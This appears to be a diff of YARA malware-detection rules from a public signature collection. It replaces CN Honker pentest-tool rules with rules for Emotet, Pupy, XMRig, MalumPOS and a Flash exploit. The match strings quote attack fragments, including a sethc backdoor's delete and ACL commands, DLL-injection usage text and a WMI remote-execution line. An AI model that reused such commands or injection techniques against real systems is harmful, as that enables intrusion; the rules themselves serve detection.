+		hash1 = "19e4a8b07f85c3d4c396d0c4e839495c9fba9405c06a631d57af588032d2416e"
 
 	strings:
-		$s1 = "%s -slave  ConnectHost ConnectPort TransmitHost TransmitPort" fullword ascii
-		$s2 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
-		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s4 = "%s -connect ConnectHost [ConnectPort]       Default:%d" fullword ascii
-		$s5 = "[+] got, ip:%s, port:%d" fullword ascii
-		$s6 = "[-] There is a error...Create a new connection." fullword ascii
+		$x1 = "$null = Iwmi Win32_Process -EnableA -Impers 3 -AuthenPacketprivacy -Name Create -Arg $ObfusK -Computer $Target" ascii wide
+		$x3 = "-Arg@{Name=$VarName;VariableValue=$OSiRis;UserName=$env:Username}" ascii wide
+		$x4 = "Device Guard Bypass Command Execution" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		filesize < 8MB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Dictionarygenerator : FILE
+rule SIGNATURE_BASE_MAL_Emotet_JS_Dropper_Oct19_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file DictionaryGenerator.exe"
+		description = "Detects Emotet JS dropper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "29ce6f8c-3092-5917-ab31-aaed7834c500"
-		date = "2015-06-23"
+		id = "34605452-8f3d-540a-b66f-4f68d9187003"
+		date = "2019-10-03"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1158-L1173"
+		reference = "https://app.any.run/tasks/aaa75105-dc85-48ca-9732-085b2ceeb6eb/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L2-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b3071c64953e97eeb2ca6796fab302d8a77d27bc"
-		logic_hash = "228bdbca3eb206e22a130e91caa2486174efba9356dbee67e80333c0cf0bb643"
-		score = 70
+		logic_hash = "563077f3bc8ee18a887eecb9f0591c693e5543a9875eebad2186745154af1ade"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "38295d728522426672b9497f63b72066e811f5b53a14fb4c4ffc23d4efbbca4a"
+		hash2 = "9bc004a53816a5b46bfb08e819ac1cf32c3bdc556a87a58cbada416c10423573"
 
 	strings:
-		$s1 = "`PasswordBuilder" fullword ascii
-		$s2 = "cracker" fullword ascii
+		$xc1 = { FF FE 76 00 61 00 72 00 20 00 61 00 3D 00 5B 00
+               27 00 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3650KB and all of them
+		uint32( 0 ) == 0x0076feff and filesize <= 700KB and $xc1 at 0
 }
-rule SIGNATURE_BASE_CN_Honker_Ms11080_Withcmd : FILE
+
+rule SIGNATURE_BASE_MAL_Emotet_Jan20_1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ms11080_withcmd.exe"
+		description = "Detects Emotet malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38c12697-7e52-5713-a566-6047abfa229b"
-		date = "2015-06-23"
+		id = "334ae7e5-0a46-5e95-bf53-0f343db4e4de"
+		date = "2020-01-29"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1175-L1190"
+		reference = "https://app.any.run/tasks/5e81638e-df2e-4a5b-9e45-b07c38d53929/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L20-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "745e5058acff27b09cfd6169caf6e45097881a49"
-		logic_hash = "1f673f845ad40efae143ec244c7c70d1e26fb51f22be6bf445085c6a7379f193"
-		score = 70
+		logic_hash = "23ffcdde3eae7637e5b47a0f940cbebafccfd4c3f222b882e73d7d02447b83c3"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d"
 
 	strings:
-		$s1 = "Usage : ms11-080.exe cmd.exe Command " fullword ascii
-		$s3 = "[>] create pipe error" fullword ascii
+		$op0 = { 74 60 8d 34 18 eb 54 03 c3 50 ff 15 18 08 41 00 }
+		$op1 = { 03 fe 66 39 07 0f 85 2a ff ff ff 8b 4d f0 6a 20 }
+		$op2 = { 8b 7d fc 0f 85 49 ff ff ff 85 db 0f 84 d1 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 340KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize <= 200KB and ( pe.imphash ( ) == "009889c73bd2e55113bf6dfa5f395e0d" or 1 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V2 : FILE
+rule SIGNATURE_BASE_MAL_Emotet_BKA_Quarantine_Apr21
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v2.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "499b251a-e0e1-5550-825d-acab112be74b"
-		date = "2015-06-23"
+		description = "No description has been set in the source file - Signature Base"
+		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
+		id = "22c27d82-00cb-5d2f-a1cc-9f8b4c60aecd"
+		date = "2021-03-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1192-L1208"
+		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L39-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a995451d9108687b8892ad630a79660a021d670a"
-		logic_hash = "979f3fe9795798743f2a57aa3b82a34e304774de58ffda5278991cf5a753a8ba"
-		score = 70
+		logic_hash = "cc75be5f641e21446a41bf9cc855330a612847e7e3a3be935577d33195f40d05"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		descripton = "The modified emotet binary replaces the original emotet on the system of the victim. The original emotet is copied to a quarantine for evidence-preservation."
+		note = "The quarantine folder depends on the scope of the initial emotet infection (user or administrator). It is the temporary folder as returned by GetTempPathW under a filename starting with UDP as returned by GetTempFileNameW. To prevent accidental reinfection by a user, the quarantined emotet is encrypted using RC4 and a 0x20 bytes long key found at the start of the quarantined file (see $key)."
+		sharing = "TLP:WHITE"
 
 	strings:
-		$s1 = "LOADER ERROR" fullword ascii
-		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
-		$s3 = "2011-2012 T00LS&RICES" fullword wide
+		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		$key at 0
 }
-rule SIGNATURE_BASE_CN_Honker_HASH_32 : FILE
+rule SIGNATURE_BASE_MAL_Emotet_BKA_Cleanup_Apr21 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 32.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a9b5b753-2028-53be-9ac8-50ec910860c3"
-		date = "2015-06-23"
+		description = "No description has been set in the source file - Signature Base"
+		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
+		id = "10d93918-8a5e-54a3-81c6-f6ff68562e13"
+		date = "2021-03-23"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1210-L1226"
+		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_emotet.yar#L54-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bf4a8b4b3e906e385feab5ea768f604f64ba84ea"
-		logic_hash = "819e70979ae1d5e237bbadaa52b504c566b4b7436747ceb0d72e206e4fc45708"
-		score = 70
+		logic_hash = "533adaed96d015ea2dcd54d5aaf9e71b5b70430ed5733a98618925cf978a6515"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		descripton = "This rule targets a modified emotet binary deployed by the Bundeskriminalamt on the 26th of January 2021."
+		note = "The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation."
+		sharing = "TLP:WHITE"
 
 	strings:
-		$s5 = "[Undefined OS version]  Major: %d Minor: %d" fullword ascii
-		$s8 = "Try To Run As Administrator ..." fullword ascii
-		$s9 = "Specific LUID NOT found" fullword ascii
+		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 240KB and all of them
+		filesize > 300KB and filesize < 700KB and uint16( 0 ) == 0x5A4D and $key
 }
-rule SIGNATURE_BASE_CN_Honker_Windows_Mstsc_Enhanced_RMDSTC : FILE
+rule SIGNATURE_BASE_SUSP_RAR_Ntdsdit : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file RMDSTC.exe"
+		description = "Detects suspicious RAR file that contains ntds.dit or SAM export"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f6e94327-cb79-5a7a-88bb-850177558978"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1228-L1243"
+		id = "da9e160f-3213-5027-bb0f-bf80ab3d5318"
+		date = "2019-12-16"
+		modified = "2022-11-15"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rar_exfil.yar#L2-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3ca2b1b6f31219baf172abcc8f00f07f560e465f"
-		logic_hash = "de676b033613beebfe9fc5a71cf5f5911f0af35d34e77d56d222c6f00114dfb6"
+		logic_hash = "12e527b040e02f573f2a6e0fac4ff99ec441bf189c9bb7e1f763619c079a5bfa"
 		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "zava zir5@163.com" fullword wide
-		$s1 = "By newccc" fullword wide
+		$x1 = "ntds.dit0" ascii fullword
+		$x2 = { 0? 53 41 4D 30 01 00 03 }
+		$x3 = { 0? 73 61 6D 30 01 00 03 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint32( 0 ) == 0x21726152 and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Mstsc_MSTSCAX : FILE
+rule SIGNATURE_BASE_Pos_Malware_Malumpos
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file MSTSCAX.DLL"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9508b613-f897-5277-97e0-30e36fb5d747"
-		date = "2015-06-23"
+		description = "Used to detect MalumPOS memory dumper"
+		author = "Trend Micro, Inc."
+		id = "6d85c7fe-bf1b-53fb-b618-4b0f8b63cae4"
+		date = "2015-05-25"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1245-L1261"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malumpos.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2fa006158b2d87b08f1778f032ab1b8e139e02c6"
-		logic_hash = "2bfe10ec4af5d0f32fc03714c0cb01d9b0d446daa67cc0cce0b83f6a57e7c5a5"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "ece32e51a12adf0d68420c8d98efbe7df27b9061ddfe4dcedf151f9f06287eee"
+		score = 75
+		quality = 35
+		tags = ""
+		sample_filtype = "exe"
 
 	strings:
-		$s1 = "ResetPasswordWWWx" fullword ascii
-		$s2 = "Terminal Server Redirected Printer Doc" fullword wide
-		$s3 = "Cleaning temp directory" fullword ascii
+		$string1 = "SOFTWARE\\Borland\\Delphi\\RTL"
+		$string2 = "B)[0-9]{13,19}\\"
+		$string3 = "[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\"
+		$string4 = "TRegExpr(exec): ExecNext Without Exec[Pos]"
+		$string5 = /Y:\\PROGRAMS\\.{20,300}\.pas/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		all of ( $string* )
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Scanner : FILE
+rule SIGNATURE_BASE_Flash_CVE_2015_5119_APT3_Leg : CVE_2015_5119 FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls_scanner.exe"
+		description = "Exploit Sample CVE-2015-5119"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80d4a950-24cb-55c7-903f-8788a71be7ac"
-		date = "2015-06-23"
+		id = "d9efaea3-0644-501a-990b-665e257beb86"
+		date = "2015-08-01"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1263-L1278"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2015_5119.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "70b04b910d82b32b90cd7f355a0e3e17dd260cb3"
-		logic_hash = "558abb651ce410520811ca96aaad78710cb9bf597b59ed89d9a678377716d721"
+		logic_hash = "99af6b9ecc18b87b14968eb8fffefac7be10dd727d8af2d0488fae4a96196e85"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2015-5119, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		yaraexchange = "No distribution without author's consent"
 
 	strings:
-		$s0 = "http://cn.bing.com/search?first=1&count=50&q=ip:" fullword wide
-		$s17 = "Team:www.t00ls.net" fullword ascii
+		$s0 = "HT_exploit" fullword ascii
+		$s1 = "HT_Exploit" fullword ascii
+		$s2 = "flash_exploit_" ascii
+		$s3 = "exp1_fla/MainTimeline" ascii fullword
+		$s4 = "exp2_fla/MainTimeline" ascii fullword
+		$s5 = "_shellcode_32" ascii
+		$s6 = "todo: unknown 32-bit target" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 330KB and all of them
+		uint16( 0 ) == 0x5746 and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Gethashes : FILE
+
+rule SIGNATURE_BASE_Pupy_Backdoor : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
+		description = "Detects Pupy backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1c5910d-0fb1-547e-92b7-5fcf183e38a6"
-		date = "2015-06-23"
+		id = "11509847-3454-5412-b3e1-02ad9cccc6ae"
+		date = "2017-08-11"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1280-L1296"
+		reference = "https://github.com/n1nj4sec/pupy-binaries"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_pupy_rat.yar#L13-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "dc8bcebf565ffffda0df24a77e28af681227b7fe"
-		logic_hash = "fb5ab5e6d8b522caf27478b0589b39d06b96fb0f913673ede768a814836e11f8"
-		score = 70
+		logic_hash = "0b12376c9cddc71f584314b07fb29fac189349b526c6d5028f475fa3984401ae"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153"
+		hash2 = "83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4"
+		hash3 = "90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc"
+		hash4 = "20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8"
+		hash5 = "06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e"
+		hash6 = "be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2"
+		hash7 = "8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01"
 
 	strings:
-		$s0 = "SAM\\Domains\\Account\\Users\\Names registry hive reading error!" fullword ascii
-		$s1 = "GetHashes <SAM registry file> [System key file]" fullword ascii
-		$s2 = "Note: Windows registry file shall begin from 'regf' signature!" fullword ascii
+		$x1 = "reflectively inject a dll into a process." fullword ascii
+		$x2 = "ld_preload_inject_dll(cmdline, dll_buffer, hook_exit) -> pid" fullword ascii
+		$x3 = "LD_PRELOAD=%s HOOK_EXIT=%d CLEANUP=%d exec %s 1>/dev/null 2>/dev/null" fullword ascii
+		$x4 = "reflective_inject_dll" fullword ascii
+		$x5 = "ld_preload_inject_dll" fullword ascii
+		$x6 = "get_pupy_config() -> string" fullword ascii
+		$x7 = "[INJECT] inject_dll. OpenProcess failed." fullword ascii
+		$x8 = "reflective_inject_dll" fullword ascii
+		$x9 = "reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)" fullword ascii
+		$x10 = "linux_inject_main" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 87KB and 2 of them
+		(( uint16( 0 ) == 0x457f or uint16( 0 ) == 0x5a4d ) and filesize < 7000KB and 1 of them ) or 3 of them or ( uint16( 0 ) == 0x5a4d and pe.imphash ( ) == "84a69bce2ff6d9f866b7ae63bd70b163" )
 }
-rule SIGNATURE_BASE_CN_Honker_Hashq_Hashq : FILE
+rule SIGNATURE_BASE_XMRIG_Monero_Miner : HIGHVOL FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Hashq.exe"
+		description = "Detects Monero mining software"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f435edf-28bf-5195-bc22-0d2a7302b312"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1298-L1314"
+		id = "71bf1b9c-c806-5737-83a9-d6013872b11d"
+		date = "2018-01-04"
+		modified = "2022-11-10"
+		reference = "https://github.com/xmrig/xmrig/releases"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L11-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7518b647db5275e8a9e0bf4deda3d853cc9d5661"
-		logic_hash = "a71ad182f7dd33790e59badfba6149c6dea627858414f0a8f3e64fd3bb2e2a64"
-		score = 70
+		logic_hash = "532e602dfc8e44326e381d0e2a189b60bc4d4f2b310169767b2326e01606a542"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0"
+		hash2 = "08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7"
+		hash3 = "f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5"
+		hash4 = "0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2"
 
 	strings:
-		$s1 = "Hashq.exe" fullword wide
-		$s5 = "CnCert.Net" fullword wide
-		$s6 = "Md5 query tool" fullword wide
+		$s1 = "'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+		$s2 = "--cpu-affinity" ascii
+		$s3 = "set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" ascii
+		$s4 = "password for mining server" fullword ascii
+		$s5 = "XMRig/%s libuv/%s%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 10MB and 2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Shiftbackdoor_Server : FILE
+rule SIGNATURE_BASE_XMRIG_Monero_Miner_Config : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Server.dat"
+		description = "Auto-generated rule - from files config.json, config.json"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c53f4015-ad2b-5898-88b5-34b3bc2c65b6"
-		date = "2015-06-23"
+		id = "374efe7f-9ef2-5974-8e24-f749183ab2d0"
+		date = "2018-01-04"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1316-L1333"
+		reference = "https://github.com/xmrig/xmrig/releases"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L35-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b24d761c6bbf216792c4833890460e8b37d86b37"
-		logic_hash = "17f1d7f2345ed1bc9b240c4851f41891244ec9d13b296a24ab6b42cca32ddf87"
-		score = 70
+		logic_hash = "5df14af366cdb0a5bf6fd88b50876fd78abfe0b795cf10af8fab0d23a54f700f"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "031333d44a3a917f9654d7e7257e00c9d961ada3bee707de94b7c7d06234909a"
+		hash2 = "409b6ec82c3bdac724dae702e20cb7f80ca1e79efa4ff91212960525af016c41"
 
 	strings:
-		$s0 = "del /q /f %systemroot%system32sethc.exe" fullword ascii
-		$s1 = "cacls %s /t /c /e /r administrators" fullword ascii
-		$s2 = "\\dllcache\\sethc.exe" ascii
-		$s3 = "\\ntvdm.exe" ascii
+		$s2 = "\"cpu-affinity\": null,   // set process affinity to CPU core(s), mask \"0x3\" for cores 0 and 1" fullword ascii
+		$s5 = "\"nicehash\": false                  // enable nicehash/xmrig-proxy support" fullword ascii
+		$s8 = "\"algo\": \"cryptonight\",  // cryptonight (default) or cryptonight-lite" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		( uint16( 0 ) == 0x0a7b or uint16( 0 ) == 0x0d7b ) and filesize < 5KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Win2003 : FILE
+rule SIGNATURE_BASE_PUA_LNX_XMRIG_Cryptominer : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file win2003.exe"
+		description = "Detects XMRIG CryptoMiner software"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f64e14dd-714c-5a0f-923d-23a584fe605f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1335-L1351"
+		id = "bbdeff2e-68cc-5bbe-b843-3cba9c8c7ea8"
+		date = "2018-06-28"
+		modified = "2023-01-06"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L53-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "47164c8efe65d7d924753fadf6cdfb897a1c03db"
-		logic_hash = "d1616c53b26eefaa2578efb7defee182e8c88c869cfffb16c8767ddc1869ad46"
-		score = 70
+		logic_hash = "501bc5b2d38882f48d1ef972dbbd379afb89f2e7c9bf69192c7bee2e19384816"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "10a72f9882fc0ca141e39277222a8d33aab7f7a4b524c109506a407cd10d738c"
 
 	strings:
-		$s1 = "Usage:system_exp.exe \"cmd\"" fullword ascii
-		$s2 = "The shell \"cmd\" success!" fullword ascii
-		$s4 = "Not Windows NT family OS." fullword ascii
+		$x1 = "number of hash blocks to process at a time (don't set or 0 enables automatic selection o" fullword ascii
+		$s2 = "'h' hashrate, 'p' pause, 'r' resume, 'q' shutdown" fullword ascii
+		$s3 = "* THREADS:      %d, %s, aes=%d, hf=%zu, %sdonate=%d%%" fullword ascii
+		$s4 = ".nicehash.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 8000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Interception3389_Setup : FILE
+rule SIGNATURE_BASE_SUSP_XMRIG_String : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file setup.exe"
+		description = "Detects a suspicious XMRIG crypto miner executable string in filr"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7250ff73-6b08-56a4-b2bc-081060d1fa2d"
-		date = "2015-06-23"
+		id = "8c6f3e6e-df2a-51b7-81b8-21cd33b3c603"
+		date = "2018-12-28"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L1353-L1371"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L72-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f5b2f86f8e7cdc00aa1cb1b04bc3d278eb17bf5c"
-		logic_hash = "d3f543683810a985a190cc3ea8edb7bfcd316d56a13d45c6532c488a4536ad0a"
-		score = 70
+		logic_hash = "d2c3145c50939e7f407125f7b9312161724b7b1a6fcbf7e27d049e49e982c7e9"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127"
 
 	strings:
-		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\%s" fullword ascii
-		$s1 = "%s\\temp\\temp%d.bat" fullword ascii
-		$s5 = "EventStartShell" fullword ascii
-		$s6 = "del /f /q \"%s\"" fullword ascii
-		$s7 = "\\wminotify.dll" ascii
+		$x1 = "xmrig.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD_2 : FILE
